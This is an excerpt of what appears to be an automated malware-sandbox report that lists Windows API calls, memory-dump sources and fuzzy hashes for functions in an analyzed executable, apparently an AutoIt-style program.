                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A03
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 007D1A0A
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A19
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007D1A2B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A44
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A56
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1A9B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1AB0
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0A67,?,00000001), ref: 007D1ABB
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: df2293b521db3624461b14e36dfa58d1a2d0eecedd72a7bba334a882c0c011cc
                                                    • Instruction ID: b9ab306e5f173c9759ac7754f37daff9644eacc5bbb501a9a43175a484435553
                                                    • Opcode Fuzzy Hash: df2293b521db3624461b14e36dfa58d1a2d0eecedd72a7bba334a882c0c011cc
                                                    • Instruction Fuzzy Hash: B0315CB1601304FFEB10DB54DD48BA97BBABBE4315F508516F905962A0DFB99D408F60
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 0077260D
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00772617
                                                    • SetBkMode.GDI32(?,00000001), ref: 0077262C
                                                    • GetStockObject.GDI32(00000005), ref: 00772634
                                                    • GetClientRect.USER32(?), ref: 007AC0FC
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 007AC113
                                                    • GetWindowDC.USER32(?), ref: 007AC11F
                                                    • GetPixel.GDI32(00000000,?,?), ref: 007AC12E
                                                    • ReleaseDC.USER32(?,00000000), ref: 007AC140
                                                    • GetSysColor.USER32(00000005), ref: 007AC15E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                    • String ID:
                                                    • API String ID: 3430376129-0
                                                    • Opcode ID: c510897d4eb851a36b800b4d59878321bc4152b2938b8129db8eefca6a392a24
                                                    • Instruction ID: c1a8320f1d4a693146028ae1d96763b63fc5166600f04e3068a3c21effcb62fa
                                                    • Opcode Fuzzy Hash: c510897d4eb851a36b800b4d59878321bc4152b2938b8129db8eefca6a392a24
                                                    • Instruction Fuzzy Hash: 01115E31500205BFDBA16FA4EC09BE97BB2FF59322F104265FA79A50E2CB360951EF11
                                                    APIs
                                                    • EnumChildWindows.USER32(?,007CB13A), ref: 007CB078
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: b026fb76b1c4c84d12f90df1dbde6b150017b6b3956041e6370b610f8eaafae5
                                                    • Instruction ID: 0847b6c70fc47fcaffebdef5bb8028d77df0e6e7edb56e15f7ed75b1252c7c4e
                                                    • Opcode Fuzzy Hash: b026fb76b1c4c84d12f90df1dbde6b150017b6b3956041e6370b610f8eaafae5
                                                    • Instruction Fuzzy Hash: 6791B37060011AEBCB18EFA0D486FEEFB74BF14304F50811DE95AA7151DF38A999CBA1
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0077327E
                                                      • Part of subcall function 0077218F: GetClientRect.USER32(?,?), ref: 007721B8
                                                      • Part of subcall function 0077218F: GetWindowRect.USER32(?,?), ref: 007721F9
                                                      • Part of subcall function 0077218F: ScreenToClient.USER32(?,?), ref: 00772221
                                                    • GetDC.USER32 ref: 007AD073
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007AD086
                                                    • SelectObject.GDI32(00000000,00000000), ref: 007AD094
                                                    • SelectObject.GDI32(00000000,00000000), ref: 007AD0A9
                                                    • ReleaseDC.USER32(?,00000000), ref: 007AD0B1
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007AD13C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: c4bd4ed98c954e3918f67afe483719d724b02ba75014430aabb44bcba2adc09e
                                                    • Instruction ID: 1c5de56dae0ab649b05b17625877c4c26927df512993b5dc1afce6d7a3994027
                                                    • Opcode Fuzzy Hash: c4bd4ed98c954e3918f67afe483719d724b02ba75014430aabb44bcba2adc09e
                                                    • Instruction Fuzzy Hash: E871B130504209DFCF318F64C884ABA7BB5FF8A360F148369ED565A266C7398D41DF60
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                      • Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
                                                      • Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                      • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                      • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007FC69C
                                                    • ImageList_EndDrag.COMCTL32 ref: 007FC6A2
                                                    • ReleaseCapture.USER32 ref: 007FC6A8
                                                    • SetWindowTextW.USER32(?,00000000), ref: 007FC752
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007FC765
                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007FC847
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 1924731296-2107944366
                                                    • Opcode ID: 6cadb244538a9a47c3413d18f4590ef1d2d3566fbf668698d585cbde7693eec5
                                                    • Instruction ID: f2d0a02d2735fd7e1cdd0eb0a8f217f5a19a63e26e61288182110895b41fbcb3
                                                    • Opcode Fuzzy Hash: 6cadb244538a9a47c3413d18f4590ef1d2d3566fbf668698d585cbde7693eec5
                                                    • Instruction Fuzzy Hash: A3518C70208308EFDB14EF14CC59F6A7BE5FB84350F008929F6A5872A1CB75A945CB62
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00800980), ref: 007E9412
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00800980), ref: 007E9446
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007E95C0
                                                    • SysFreeString.OLEAUT32(?), ref: 007E95EA
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: d9569221d892d0dbbc78432ba3b1b1625225da5cefe2e2f9c199b6482a685e24
                                                    • Instruction ID: f76b2a2611693b4f8b7be2f92bf24155d4e924028463f016e4800df085ef7c59
                                                    • Opcode Fuzzy Hash: d9569221d892d0dbbc78432ba3b1b1625225da5cefe2e2f9c199b6482a685e24
                                                    • Instruction Fuzzy Hash: D5F13B72A01209EFCF14DF95C888EAEB7B9FF49314F148058F616AB291DB35AE45CB50
                                                    APIs
                                                    • _memset.LIBCMT ref: 007EFD9E
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF31
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF55
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF95
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFFB7
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007F0133
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007F0165
                                                    • CloseHandle.KERNEL32(?), ref: 007F0194
                                                    • CloseHandle.KERNEL32(?), ref: 007F020B
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 92ecaa9cf6022cd5653c6377a95c2de50542f6e863b8214eb11abca13e09dcfe
                                                    • Instruction ID: a28f84035055b1c5400ed4df8ae6b59a00d4bcbd046c84198336fc8e9fbdde5a
                                                    • Opcode Fuzzy Hash: 92ecaa9cf6022cd5653c6377a95c2de50542f6e863b8214eb11abca13e09dcfe
                                                    • Instruction Fuzzy Hash: 6EE1A131204341DFCB14EF25C895B6ABBE1AF89350F14845DF5999B3A2DB39EC41CB92
                                                    APIs
                                                      • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0
                                                      • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9
                                                      • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 007D52FB
                                                    • _wcscmp.LIBCMT ref: 007D5315
                                                    • MoveFileW.KERNEL32(?,?), ref: 007D5330
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: 8791429578984f31a1ebba0987f4d9a3a9bbc2f373ed2f6c4da7eb4399befb9c
                                                    • Instruction ID: 5e2f9a9302f9731e6edfc5a47bc2787a77d3394d761dd7edf37502107234e8de
                                                    • Opcode Fuzzy Hash: 8791429578984f31a1ebba0987f4d9a3a9bbc2f373ed2f6c4da7eb4399befb9c
                                                    • Instruction Fuzzy Hash: E15176B20087859BC764EBA0D8859DFB3ECAF84301F50491FF189D3152EF38A6898766
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007F8D24
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 2345f7f48202def8a0a7f2dec4871ebe37a3d6b9cb48b57b0ec2319fdc8e82af
                                                    • Instruction ID: 4edfb87e470497b3c5cdc2e7848dbe42b02e6205f8a7afc22a89b5120f5aebe0
                                                    • Opcode Fuzzy Hash: 2345f7f48202def8a0a7f2dec4871ebe37a3d6b9cb48b57b0ec2319fdc8e82af
                                                    • Instruction Fuzzy Hash: 6651A03064020CFEEFA09B28CC89BB93B64BF04350F244551F724EA3E1CF79A950DA62
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007AC638
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AC65A
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007AC672
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007AC690
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007AC6B1
                                                    • DestroyIcon.USER32(00000000), ref: 007AC6C0
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007AC6DD
                                                    • DestroyIcon.USER32(?), ref: 007AC6EC
                                                      • Part of subcall function 007FAAD4: DeleteObject.GDI32(00000000), ref: 007FAB0D
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
                                                    • Instruction ID: 2612a8633651fff21989dcc968745ef678602e0311ec7e33e95266e4b240337e
                                                    • Opcode Fuzzy Hash: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
                                                    • Instruction Fuzzy Hash: EA514770600209EFDF24DF24CC49BAA77B5FB84750F108A28F956A72A0DB79E991DB50
                                                    APIs
                                                      • Part of subcall function 007CB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CB54D
                                                      • Part of subcall function 007CB52D: GetCurrentThreadId.KERNEL32 ref: 007CB554
                                                      • Part of subcall function 007CB52D: AttachThreadInput.USER32(00000000,?,007CA23B,?,00000001), ref: 007CB55B
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA246
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007CA263
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007CA266
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA26F
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007CA28D
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA290
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA299
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007CA2B0
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA2B3
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
                                                    • Instruction ID: 4240c48d7e9a8684220fba218da0ea28fbe4ff9fb19b6d9404ad5076158ebfbf
                                                    • Opcode Fuzzy Hash: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
                                                    • Instruction Fuzzy Hash: 0211E1B1A50218BEF7106F609C8AF6A3B2DEB8C765F100419F354AB0D1CAF35C609EA0
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007C915A,00000B00,?,?), ref: 007C94E2
                                                    • HeapAlloc.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C94E9
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C94FE
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,007C915A,00000B00,?,?), ref: 007C9506
                                                    • DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9509
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C9519
                                                    • GetCurrentProcess.KERNEL32(007C915A,00000000,?,007C915A,00000B00,?,?), ref: 007C9521
                                                    • DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9524
                                                    • CreateThread.KERNEL32(00000000,00000000,007C954A,00000000,00000000,00000000), ref: 007C953E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
                                                    • Instruction ID: 6ee8b91d3e990868b2ae2bcb146822e83068c72c3e5bad92259afa69b5b2ad0e
                                                    • Opcode Fuzzy Hash: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
                                                    • Instruction Fuzzy Hash: 1901B6B5640308BFE791ABA5DC4DF6B7BACFB89711F108411FA05DB2A1CA749800CF20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
                                                    • Instruction ID: 024f40e5f92c59aea5b7ff66138fb4f5ded33ee7105ebd5efa7a1f819e68f471
                                                    • Opcode Fuzzy Hash: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
                                                    • Instruction Fuzzy Hash: 75C1A171A0125AAFDF10CF99C884BAEB7F5FF48314F148469E915AB280E778AD44CB51
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-625585964
                                                    • Opcode ID: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
                                                    • Instruction ID: 2f3f7609f6ee94e030cfdbea5fbf49b8c92a2071f67ae7bcea653ddf42f617ce
                                                    • Opcode Fuzzy Hash: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
                                                    • Instruction Fuzzy Hash: A191A372A01259ABCF24CF96C844F9EB7B8EF49714F10815DF615AB241D778A944CFA0
                                                    APIs
                                                      • Part of subcall function 007C7D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?,?,007C8073), ref: 007C7D45
                                                      • Part of subcall function 007C7D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D60
                                                      • Part of subcall function 007C7D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?,?), ref: 007C7D6E
                                                      • Part of subcall function 007C7D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7C62,80070057,?), ref: 007C7D7E
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007E9EF0
                                                    • _memset.LIBCMT ref: 007E9EFD
                                                    • _memset.LIBCMT ref: 007EA040
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007EA06C
                                                    • CoTaskMemFree.OLE32(?), ref: 007EA077
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 007EA0C5
                                                    Memory Dump Source
